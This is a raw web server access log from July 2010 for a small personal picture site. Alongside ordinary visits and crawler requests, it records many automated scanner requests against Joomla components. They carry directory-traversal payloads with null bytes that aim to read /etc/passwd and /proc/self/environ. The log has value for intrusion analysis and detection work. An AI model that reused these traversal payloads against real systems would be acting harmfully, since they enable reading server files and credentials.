91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:43 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:22:56 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:10 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
91.177.225.55 - - [09/Jul/2010:13:23:20 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Opera/9.80 (Windows NT 6.1; U; nl) Presto/2.5.24 Version/10.53"
67.195.112.232 - - [09/Jul/2010:13:23:29 -0500] "GET /logs/access_log.1268611200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.111.7.188 - - [09/Jul/2010:13:25:31 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
218.150.85.170 - - [09/Jul/2010:13:25:56 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
62.2.105.202 - - [09/Jul/2010:13:26:41 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:26:42 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:26:42 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:26:42 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:26:43 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:26:43 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:28:20 -0500] "GET /logs/access_log.1276128000//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:28:20 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:28:21 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:30:22 -0500] "GET /logs/access_log.1275609600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:30:22 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:30:22 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:33:59 -0500] "GET /logs/access_log.1275609600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:34:00 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:34:00 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
65.55.37.202 - - [09/Jul/2010:13:35:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.230 - - [09/Jul/2010:13:35:34 -0500] "GET /logs/access_log.1183075200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.2.105.202 - - [09/Jul/2010:13:36:17 -0500] "GET /logs/access_log.1275609600//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:36:18 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
62.2.105.202 - - [09/Jul/2010:13:36:18 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.44.123.3 - - [09/Jul/2010:13:43:19 -0500] "GET /logs/access_log.1276041600//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:43:19 -0500] "GET //index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
118.69.206.77 - - [09/Jul/2010:13:43:21 -0500] "GET /logs/access_log.1277510400//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:13:43:22 -0500] "GET //?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
118.69.206.77 - - [09/Jul/2010:13:43:22 -0500] "GET /logs//?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 12642 "-""libwww-perl/5.831"
62.44.123.3 - - [09/Jul/2010:13:43:23 -0500] "GET /logs//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:43:33 -0500] "GET /logs/access_log.1276732800//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:43:54 -0500] "GET /logs/access_log.1276732800//index.php?option=com_swmenufree&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:02 -0500] "GET /logs/access_log.1277942400//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:04 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:04 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:08 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
95.111.7.188 - - [09/Jul/2010:13:44:23 -0500] "GET /logs/access_log.1277942400//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:44:24 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
95.111.7.188 - - [09/Jul/2010:13:44:24 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
62.44.123.3 - - [09/Jul/2010:13:44:27 -0500] "GET /logs/access_log.1277942400//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:35 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:44:38 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
95.111.7.188 - - [09/Jul/2010:13:45:59 -0500] "GET /logs/access_log.1276128000//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
62.44.123.3 - - [09/Jul/2010:13:49:20 -0500] "GET /logs/access_log.1276041600//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:49:20 -0500] "GET /logs//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:49:20 -0500] "GET //index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:49:24 -0500] "GET /logs/access_log.1277424000//index.php?option=com_bsq_sitestats&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:15 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:24 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:24 -0500] "GET /logs/access_log.1277078400/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:30 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:31 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:33 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:39 -0500] "GET /logs/access_log.1277942400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:42 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:43 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:44 -0500] "GET /logs/access_log.1277942400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
218.150.85.170 - - [09/Jul/2010:13:51:51 -0500] "GET /logs/access_log.1275696000//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jul/2010:13:51:52 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
218.150.85.170 - - [09/Jul/2010:13:51:52 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
62.44.123.3 - - [09/Jul/2010:13:51:57 -0500] "GET /logs/access_log.1277942400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:59 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:51:59 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:01 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:01 -0500] "GET /logs/access_log.1277683200/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:05 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:13 -0500] "GET /logs/access_log.1277942400//index.php?option=com_letterman&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:16 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:16 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:17 -0500] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:17 -0500] "GET /logs/access_log.1277942400/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:19 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:53:25 -0500] "GET /logs/access_log.1276128000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.44.123.3 - - [09/Jul/2010:13:54:03 -0500] "GET /logs/access_log.1276128000//index.php?option=com_letterman&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
75.54.233.36 - - [09/Jul/2010:13:54:57 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)"
